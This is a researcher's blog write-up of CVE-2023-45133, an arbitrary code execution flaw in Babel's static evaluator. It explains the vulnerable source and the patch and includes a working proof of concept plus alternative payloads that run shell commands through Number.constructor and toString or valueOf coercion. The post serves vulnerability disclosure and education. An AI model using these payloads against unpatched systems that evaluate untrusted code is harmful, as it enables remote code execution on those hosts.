On October 10th, 2023, I stumbled upon an arbitrary code execution vulnerability in Babel, which was subsequently assigned the identifier CVE-2023-45133. In this post, I’ll walk you through the journey of discovering and exploiting this intriguing flaw.
This article was originally published on William Khem Marquez's blog. He also published a series on using Babel to deobfuscate JavaScript code: check it out!
Those who use Babel for reverse engineering/code deobfuscation love using Babel because of all of the built in functionality it provides. One of the most useful features is the ability to statically evaluate expressions using path.evaluate()
and path.evaluateTruthy()
. I have written about this in the previous articles:
Wait, did I say statically evaluate?
The Exploit
Before delving into the details, let’s take a look at the proof of concept I came up with:
Proof of Concept
const parser = require("@babel/parser");
const traverse = require("@babel/traverse").default;
const source = `String({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")});`;
const ast = parser.parse(source);
const evalVisitor = {
Expression(path) {
path.evaluate();
},
};
traverse(ast, evalVisitor);
This simply outputs the result of the id
command to the terminal, as can be seen below.
┌──(kali㉿kali)-[~/Babel RCE]
└─$ node exploit.js
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),115(scanner),138(wireshark),141(kaboxer),142(vboxsf)
Of course, the payload can be adapted to do anything, such as exfiltrate data or spawn a reverse shell.
Exploit Breakdown
To understand why this vulnerability works, we need to understand the source code of the culprit function, evaluate
. The source code of babel-traverse/src/path/evaluation.ts
prior to the fix is archived here
/**
* Walk the input `node` and statically evaluate it.
*
* Returns an object in the form `{ confident, value, deopt }`. `confident`
* indicates whether or not we had to drop out of evaluating the expression
* because of hitting an unknown node that we couldn't confidently find the
* value of, in which case `deopt` is the path of said node.
*
* Example:
*
* t.evaluate(parse("5 + 5")) // { confident: true, value: 10 }
* t.evaluate(parse("!true")) // { confident: true, value: false }
* t.evaluate(parse("foo + foo")) // { confident: false, value: undefined, deopt: NodePath }
*
*/
export function evaluate(this: NodePath): {
confident: boolean;
value: any;
deopt?: NodePath;
} {
const state: State = {
confident: true,
deoptPath: null,
seen: new Map(),
};
let value = evaluateCached(this, state);
if (!state.confident) value = undefined;
return {
confident: state.confident,
deopt: state.deoptPath,
value: value,
};
}
When evaluate
is called on a NodePath, it goes through the evaluatedCached
wrapper, before reaching the _evaluate
function which does all the heavy lifting. The _evaluate
function is where the vulnerability lies.
This function is responsible for recursively breaking down AST nodes until it reaches an atomic operation that can be evaluated confidently. The majority of the base cases are evaluated for atomic operations only (such as for binary expressions between two literals). However, there are a few exceptions to this rule.
The two pieces of the source code we care about are the handling of call expressions and object expressions, as shown below:
Vulnerable Source Code
Relevant _evaluate
source code
const VALID_OBJECT_CALLEES = ["Number", "String", "Math"] as const;
const VALID_IDENTIFIER_CALLEES = [
"isFinite",
"isNaN",
"parseFloat",
"parseInt",
"decodeURI",
"decodeURIComponent",
"encodeURI",
"encodeURIComponent",
process.env.BABEL_8_BREAKING ? "btoa" : null,
process.env.BABEL_8_BREAKING ? "atob" : null,
] as const;
const INVALID_METHODS = ["random"] as const;
function isValidObjectCallee(
val: string
): val is (typeof VALID_OBJECT_CALLEES)[number] {
return VALID_OBJECT_CALLEES.includes(
// @ts-expect-error val is a string
val
);
}
function isValidIdentifierCallee(
val: string
): val is (typeof VALID_IDENTIFIER_CALLEES)[number] {
return VALID_IDENTIFIER_CALLEES.includes(
// @ts-expect-error val is a string
val
);
}
function isInvalidMethod(val: string): val is (typeof INVALID_METHODS)[number] {
return INVALID_METHODS.includes(
// @ts-expect-error val is a string
val
);
}
function _evaluate(path: NodePath, state: State): any {
/** snip **/
if (path.isObjectExpression()) {
const obj = {};
const props = path.get("properties");
for (const prop of props) {
if (prop.isObjectMethod() || prop.isSpreadElement()) {
deopt(prop, state);
return;
}
const keyPath = (prop as NodePath<t.ObjectProperty>).get("key");
let key;
// @ts-expect-error todo(flow->ts): type refinement issues ObjectMethod and SpreadElement somehow not excluded
if (prop.node.computed) {
key = keyPath.evaluate();
if (!key.confident) {
deopt(key.deopt, state);
return;
}
key = key.value;
} else if (keyPath.isIdentifier()) {
key = keyPath.node.name;
} else {
key = (
keyPath.node as t.StringLiteral | t.NumericLiteral | t.BigIntLiteral
).value;
}
const valuePath = (prop as NodePath<t.ObjectProperty>).get("value");
let value = valuePath.evaluate();
if (!value.confident) {
deopt(value.deopt, state);
return;
}
value = value.value;
// @ts-expect-error key is any type
obj[key] = value;
}
return obj;
}
/** snip **/
if (path.isCallExpression()) {
const callee = path.get("callee");
let context;
let func;
// Number(1);
if (
callee.isIdentifier() &&
!path.scope.getBinding(callee.node.name) &&
(isValidObjectCallee(callee.node.name) ||
isValidIdentifierCallee(callee.node.name))
) {
func = global[callee.node.name];
}
if (callee.isMemberExpression()) {
const object = callee.get("object");
const property = callee.get("property");
// Math.min(1, 2)
if (
object.isIdentifier() &&
property.isIdentifier() &&
isValidObjectCallee(object.node.name) &&
!isInvalidMethod(property.node.name)
) {
context = global[object.node.name];
// @ts-expect-error property may not exist in context object
func = context[property.node.name];
}
// "abc".charCodeAt(4)
if (object.isLiteral() && property.isIdentifier()) {
// @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type (StringLiteral and NumberLiteral)
const type = typeof object.node.value;
if (type === "string" || type === "number") {
// @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type
context = object.node.value;
func = context[property.node.name];
}
}
}
if (func) {
const args = path
.get("arguments")
.map((arg) => evaluateCached(arg, state));
if (!state.confident) return;
return func.apply(context, args);
}
}
/** snip **/
}
Handling of Call Expressions
The first thing to understand is that while call expressions can indeed be evaluated, they are subject to a whitelist check, relying on the VALID_OBJECT_CALLEES
or VALID_IDENTIFIER_CALLEES
arrays.
Additionally, there are three cases for handling call expressions:
- When the callee is an identifier, and the identifier is whitelisted in
VALID_OBJECT_CALLEES
orVALID_IDENTIFIER_CALLEES
. - When the callee is a member expression, the object is an identifier, the identifier is whitelisted in
VALID_OBJECT_CALLEES
, and the property is not blacklisted inINVALID_METHODS
. - When the callee is a member expression, the object is a literal, and the property is a string/numeric literal.
The most interesting one is the second case:
if (
object.isIdentifier() &&
property.isIdentifier() &&
isValidObjectCallee(object.node.name) &&
!isInvalidMethod(property.node.name)
) {
context = global[object.node.name];
// @ts-expect-error property may not exist in context object
func = context[property.node.name];
}
/** snip **/
if (func) {
const args = path.get("arguments").map((arg) => evaluateCached(arg, state));
if (!state.confident) return;
return func.apply(context, args);
}
The only blacklisted method is random
, which is a method of the Math
object. This means that any other method of either the whitelisted Number
, String
, or Math
objects can be directly referenced.
In JavaScript, all classes are functions. Since Number
and String
are global JavaScript classes, their constructor
property points to the Function
constructor.
Therefore, the two expressions below are equivalent:
Number.constructor('javascript_code_here;');
Function('javascript_code_here;');
Passing in an arbitrary string to the Function
constructor returns a function that will evaluate the provided string as JavaScript code when called.
The AST node generated by Number.constructor('javascript_code_here;')
contains:
- A call expression, where
- The callee is a member expression, where
- The object is an identifier, with name whitelisted by
VALID_OBJECT_CALLEES
- The property is an identifier, not blacklisted by
INVALID_METHODS
- The object is an identifier, with name whitelisted by
- The arguments are a single string literal, containing the code to be executed.
- The callee is a member expression, where
Therefore, the code is considered safe to evaluate, and we have successfuly crafted a malicious function.
However, it is crucial to note that this cannot call the function on its own. It only creates an anonymous function.
So, how exactly can we call the function? This is where the second piece of the puzzle comes in: object expressions.
Handling of Object Expressions
Within Babel’s _evaluate
method, an ObjectExpression
node undergoes recursive evaluation, producing a true JavaScript object. There’s no limitation on key names for ObjectProperty
. As long as every ObjectProperty
child in the ObjectExpression
yields confident: true
from _evaluate()
, we can obtain a JavaScript object with custom keys/values.
A key property to leverage is toString
(MDN Reference). Defining this property on an object to a function we control will allow us to execute arbitrary code when the object is converted to a string.
This is exactly what we do in the payload:
String(({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
We’ve assigned our malicious function, crafted via the Function
constructor, to the toString
property of the object. Thus, when this object undergoes a string conversion, it gets triggered and executed.
In the provided example, we pass the object to the String
function, given its status as a whitelisted function (referenced in case 1). Still, the String
constructor isn’t mandatory. Implicit type coercion in JavaScript can also trigger our malicious function, as demonstratedin these alternative payload formats:
""+(({ toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
1+(({ valueOf: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
The first example employs type-coercion to transform the object into a string. In contrast, the second example utilizes type-coercion to convert it into a number, as detailed in Object.prototype.valueOf(). Both examples exploit the _evaluate()
method’s approach to handling BinaryExpression
nodes, which directly performs the operation after recursively evaluating the left and right operands.
The Patch
Upon disclosing this vulnerability, I was impressed by the swift response from the Babel team, who promptly rolled out a patch. This patch was released in two parts:
The first of which was a workaround for all of the affected official Babel packages, by guarding the calls to evalute()
with an isPure()
check. isPure inherently prevents this bug, as it returns false for all MemberExpression
nodes. PR #16032: Update babel-polyfills packages
The subsequent step involved refining the evaluate()
function. This adjustment ensured that all inherited methods, not only constructor
, were prevented from being called. PR #16033: Only evaluate own String/Number/Math methods
After the fixes were implemented, GitHub staff issued CVE-2023-45133 for the security advisory.
A side note on disclosure timing
You might have noticed that this blog post was released on the same day as the security advisory. Usually for critical vulnerabilities, it’s customary to wait a while before disclosing a proof of concept. However, I believe this disclosure timing is justifiable for a few reasons:
Predominantly, the vast majority of Babel users remain unaffected by this vulnerability. Babel is primarily utilized for refactoring and transpiling one’s own code, which means the typical use case doesn’t expose users to this risk. It’s improbable that many have server-side implementations that accept and process arbitrary code from users through the compilation plugins or the invocation of path.evaluate
. Furthermore, there are really only a couple real use-cases for using Babel to analyze untrusted code on the server-side:
- Reverse engineering bot mitigation software, etc.
- Malware analysis
In the first case, I doubt any legitimate bot mitigation entity would try to attempt Remote Code Execution (RCE) due to the legal ramifications. Meanwhile, professionals using Babel for malware reversal possess the expertise to conduct their analyses within controlled, sandboxed environments. Thus, the risk to the community, in real-world scenarios, remains minimal.
Conclusion
Discovering and delving into this vulnerability was a fun experience. I initially stumbled upon the vulnerability during a brainstorming session for a Babel-based challenge for UofTCTF’s upcoming capture the flag competition, where I was focusing on an entirely different, non-security-related “bug”.
This vulnerability predominantly impacts those integrating untrusted code with Babel. Unfortunately, this places individuals leveraging Babel for “static deobfuscation” directly in the crosshairs of this attack vector.
There’s a touch of irony in the fact that my first credited CVE emerged from reverse engineering Babel - the very tool I often employ for reverse engineering JavaScript, and the topic of all of my previous posts 🤣.
This was a great learning experience, and hopefully this write-up was useful to you as well. Thanks for reading, and take care!